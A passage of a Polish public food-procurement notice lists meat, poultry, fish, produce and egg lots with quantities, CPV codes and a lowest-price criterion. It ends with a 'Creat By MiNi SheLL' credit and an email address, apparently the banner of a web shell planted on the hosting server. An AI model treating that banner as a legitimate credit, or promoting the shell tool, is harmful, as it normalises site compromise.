3	Kurczaki świeże całe tusze wypatroszone, bez przerostów tłuszczowych, powierzchnia niezakrwawiona, niepostrzępiona. Barwa mięśni jasnoróżowa.	kg.	1 470
4	Udko/noga z kurczaka świeże , kość udowa łącznie z otaczającymi mięśniami, bez przerostów tłuszczowych, powierzchnia niezakrwawiona, niepostrzępiona. Barwa mięśni jasnoróżowa.	kg.	1 200
5	Wątroba drobiowa świeża  -całe wątróbki bez pęcherzyków żółciowych, powierzchnia czysta, niepostrzępiona. Barwa jednolita, charakterystyczna dla tego produktu.	kg.	165
6	Żołądki drobiowe świeże -całe żołądki wypatroszone, bez przerostów tłuszczowych, powierzchnia niezakrwawiona, niepostrzępiona. Barwa  charakterystyczna dla tego rodzaju produktu.	kg.	120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 11.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Produkty zwierzęce, mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu	Jm.	Średnia ilość na 12 m-cy
1	Baleron gotowany  powierzchnia czysta lekko wilgotna , konsystencja soczysta krucha. Niedopuszczalne skupiska galarety oraz wyciek soku podczas krojenia  Plaster grubości 3mm nie powinien się rozpadać. Wyrób umiarkowanie słony.	kg.	132
2	Boczek gotowany ekstra b/k- powierzchnia czysta lekko wilgotna , konsystencja soczysta krucha. Niedopuszczalne skupiska galarety oraz wyciek soku podczas krojenia oraz pozostałości kości. Plaster grubości 3mm nie powinien się rozpadać.  Wyrób umiarkowanie słony.	kg.	140
3	Flaki wołowe gotowane krojone w paski  	kg.	330
4	Karkówka b/k świeża-część zasadnicza wieprzowiny odcięta     z odcinka szyjnego półtuszy.	kg.	122
5	Kaszanka - wyrób w jelicie naturalnym wieprzowym lub           w osłonce sztucznej. Konsystencja ścisła, dobrze związana.  Wyrób umiarkowanie słony.	kg.	330
6	Krupnioki-wyrób w jelicie naturalnym wieprzowym. Konsystencja ścisła, dobrze związana.  Wyrób umiarkowanie słony.	Kg 	10
7	Kiełbasa krakowska  wieprzowa -batony       w osłonkach sztucznych    o długości od 35cm-45cm i średnicy  od 80mm-100mm. Konsystencja ścisła, plastry grubości 3mm nie powinny się rozpadać. Wyrób umiarkowanie słony. 	kg.	64
8	Kiełbasa podwawelska                              w osłonkach naturalnych  średnio rozdrobnionych, wędzonych. Konsystencja ścisła. Plastry grubości 3mm  nie powinny rozpadać się. Wyrób umiarkowanie słony.	Kg 	64
9	Kiełbasa szynkowa- wieprzowa   batony w osłonkach sztucznych  o długości od 35cm-45cm i średnicy od 80mm-100mm. Konsystencja ścisła, plastry grubości 3mm nie powinny się rozpadać.  Wyrób umiarkowanie słony. 	kg.	230
10	Kiełbasa toruńska  w osłonkach naturalnych. Konsystencja ścisła , dość krucha, dobre związanie składników.  Wyrób średnio rozdrobniony , niedopuszczalne kawałki chrząstek.  Wyrób umiarkowanie słony.	kg.	156
11	Kiełbasa wiejska wyrób regionalnygatunek I  w osłonkach naturalnych , średnio rozdrobniona, wędzona, na przekroju widoczne kawałki mięsa wieprzowego . Konsystencja ścisła. Plastry grubości 3mm  nie powinny rozpadać się. Wyczuwalne przyprawy: pieprz,  czosnek. Wyrób umiarkowanie słony. 	kg.	184
12	Kiełbasa żywiecka batony                        w osłonkach sztucznych o długości od 35cm-45cm i średnicy  od 80mm-100mm. Konsystencja ścisła, plastry grubości 3mm nie powinny się rozpadać.  Wyrób umiarkowanie słony	kg.	55
13	Kości wieprzowe  pokrzeptowe  od schabu lub karkówki klasa I.	kg.	1 470
14	Łopatka wieprzowa b/k  świeża -część zasadnicza wieprzowiny bez fałdu skóry, kości i bez tłuszczu. Powierzchnia niezakrwawiona, niepostrzępiona. Barwa mięśni jasnoróżowa do czerwonej.	kg.	520
15	Mortadela batony w osłonkach sztucznych. Konsystencja ścisła, elastyczna, plastry grubości 3mm nie powinny się rozpadać. Wyrób umiarkowanie słony.	kg.	51
16	Parówka cienka drobiowa w osłonkach naturalnych lub sztucznych . Wyrób umiarkowanie słony.	kg.	415
17	Parówka gruba wieprzowa  w osłonkach naturalnych lub sztucznych . Wyrób umiarkowanie słony.	kg.	165
18	Pasztet wiejski w osłonkach naturalnych. Konsystencja smarowna, dobrze związana, bez rozwarstwień składników. Wyrób umiarkowanie słony	Kg 	74
19	Pasztet pieczony z indyka -wyrób             w foremkach aluminiowych o wadze 500g, zapieczony. Konsystencja smarowna, dobrze związana, bez rozwarstwień składników. Wyrób umiarkowanie słony.	kg.	46
20	Polędwica drobiowa  -batony w osłonkach sztucznych o długości od 35cm-40cm i średnicy  od 80mm-100mm. Konsystencja ścisła, plastry grubości 3mm nie powinny się rozpadać. Wyrób umiarkowanie słony.	kg.	185
21	Polędwica wieprzowa sopocka -wędzony schab bez kości o barwie charakterystycznej dla wyrobu  (kolor złoty). Konsystencja ścisła, plastry  grubości 3mm nie powinny się rozpadać. Wyrób umiarkowanie słony.	kg.	260
22	Rolada drobiowa  nadziewana farszem drobiowym z przyprawami. Konsystencja ścisła , plastry  grubości 3mm nie powinny się rozpadać. Wyrób umiarkowanie słony.	kg.	120
23	Salceson  domowy-wieprzowy wyrób          w osłonce sztucznej. Konsystencja soczysta. Plaster grubości 5mm nie powinien się rozpadać. Wyrób umiarkowanie słony.	kg.	65
24	Salceson drobiowy -wyrób w osłonce sztucznej. Konsystencja soczysta. Plaster grubości 5mm nie powinien się rozpadać.	kg.	210
25	Schab b/k świeży -część zasadnicza wieprzowiny odcięta od półtuszy bez kości  i tłuszczu. Powierzchnia niezakrwawiona, niepostrzępiona. Barwa mięśni jasnoróżowa do czerwonej.	kg.	80
26	Schab pieczony, wyrób wędzony, parzony, zapiekany. Wyprodukowany z peklowanego schabu wieprzowego  konsystencja soczysta. Plastry grubości 3mm nie powinny się rozpadać. Wyrób umiarkowanie słony.	Kg 	92
27	Słonina bez skóry  Wyrób barwy białej       o grubości  powyżej 2cm.	kg.	120
28	Szynka  wieprzowa parzona. Powierzchnia czysta, sucha. Konsystencja soczysta krucha, niedopuszczalne skupiska galarety na przekroju, oraz wyciek soku. Plastry grubości 3mm nie powinny się rozpadać. Wyrób umiarkowanie słony.	kg.	275
29	Szynka pieczona  -wyrób zapiekany w foremkach. Powierzchnia czysta, sucha. Konsystencja soczysta krucha, niedopuszczalne skupiska galarety na przekroju, oraz wyciek soku. Plastry grubości 3mm nie powinny się rozpadać. Wyrób umiarkowanie słony. .	kg.	97
30	Szynka z indyka  - batony w osłonkach sztucznych o długości od 35cm-40cm i średnicy  od 80mm-100mm. Konsystencja ścisła, plastry grubości 3mm nie powinny się rozpadać. Wyrób umiarkowanie słony. 	kg.	120
31	Wołowina b/k  świeża-mięso uzyskane z części udźca, bez kości i tłuszczu .Powierzchnia niezakrwawiona, niepostrzępiona. Barwa mięśni jasnoróżowa do czerwonej.	kg.	800
32	Żeberka wieprzowe  świeże klasa I .Słonina całkowicie odcięta. Powierzchnia niezakrwawiona, niepostrzępiona. Barwa mięśni jasnoróżowa do czerwonej.	kg.	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 11.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Ryby przetworzone i konserwowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu	Jm.	Maksymalna ilość do
1	Filet  z pangi bez glazury  mrożony  metodą shatter pack (SHP)	kg.	285
2	Filet  z dorsza bez glazury mrożony metodą shatter pack (SHP)    	Kg 	430
3	Filet z mintaja bez glazury  mrożony  metodą shatter pack(SHP)	kg.	220
4	Filet  z miruny bez glazury mrożony metodą shatter pack(SHP)	Kg 	165
5	Karp świeży patroszony bez głów /waga od 1,20kg-1,50kg/	kg.	20
6	Filety z makreli w oleju 170g kawałki ryby bez jarzyn	Szt 	830
7	Filety z makreli w sosie pomidorowym 170g kawałki ryby bez jarzyn	Szt	830
8	Ryba wędzona - makrela	kg.	150
9	Szprot w pomidorach  170g, kawałki ryb  bez jarzyn	Szt	830
10	Śledzie  marynowane w oleju. Opakowanie 2,50kg  lub 4kg.	kg.	165
11	Tuńczyk w sosie własnym w kawałkach 170g	Szt	130.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 11.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Ziemniaki, warzywa korzeniowe i bulwiaste, warzywa owocowe, warzywa liściaste, owoce tropikalne, owoce i inne niż tropikalne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu	Jm.	Maksymalna ilość do
1	Arbuzy - (od VII-IX)	kg.	720
2	Banany	kg.	825
3	Borówki -(VI-IX)	kg.	90
4	Brokuły - (od VI-XI)	Szt 	160
5	Brzoskwinie-(od VII-IX)	kg.	360
6	Buraki ćwikłowe	kg.	1 000
7	Cebula	kg.	415
8	Cytryny	kg.	1 490
9	Czereśnie -(od V-VII)	kg.	70
10	Czosnek	kg.	13
11	Fasola Jaś suszona	kg.	74
12	Fasola szparagowa -(od VI-X)	kg.	90
13	Groch krakowiak	kg.	3
14	Groch omielany	kg.	18
15	Gruszki -(VIII-XII)	kg.	180
16	Jabłka klasa I	kg.	5 600
17	Kalafior - (od VI-XI)	Szt.	630
18	Kapusta biała	kg.	530
19	Kapusta czerwona	kg.	83
20	Kapusta kiszona	kg.	700
21	Kapusta pekińska	Szt.	410
22	Kapusta włoska	kg.	20
23	Koper zielony w pęczkach	Szt.	825
24	Maliny -(od VII -X)	Kg 	50
25	Mandarynki	kg.	330
26	Marchew	kg.	2 640
27	Natka pietruszki w pęczkach	Szt.	825
28	Nektarynki (od VII-IX)	kg.	450
29	Ogórki kiszone	kg.	110
30	Ogórki zielone - (od V-IX)	kg.	380
31	Papryka czerwona  świeża	kg.	9
32	Pieczarki świeże	kg.	165
33	Pietruszka korzeń	kg.	690
34	Pomarańcze	kg.	1 070
35	Pomidory - (od VI-X)	kg.	940
36	Pory	kg.	92
37	Porzeczki czarne  (od VII -IX)	kg.	60
38	Rzodkiewka  w pęczkach-  (od V-IX)	Szt.	110
39	Sałata zielona -  (od V-IX)	Szt.	220
40	Seler korzeń	kg.	825
41	Szczypiorek w pęczkach	Szt.	730
42	Śliwki-węgierka  (od VII-IX)	kg.	360
43	Truskawki - (od VI-VII)	kg.	495
44	Winogrona 	kg.	495
45	Wiśnie  (od VII-IX)	kg.	225
46	Ziemniaki jadalne odmiana sypka	kg.	10 720.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.20.00-1, 03.22.11.00-7, 03.22.12.00-8, 03.22.13.00-9, 03.22.21.10-7, 03.22.23.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 11.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Jajka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu	Jm.	Średnia ilość na 12 m-cy
1	Jaja kurze wielkość L	Szt.	31 300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 11.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com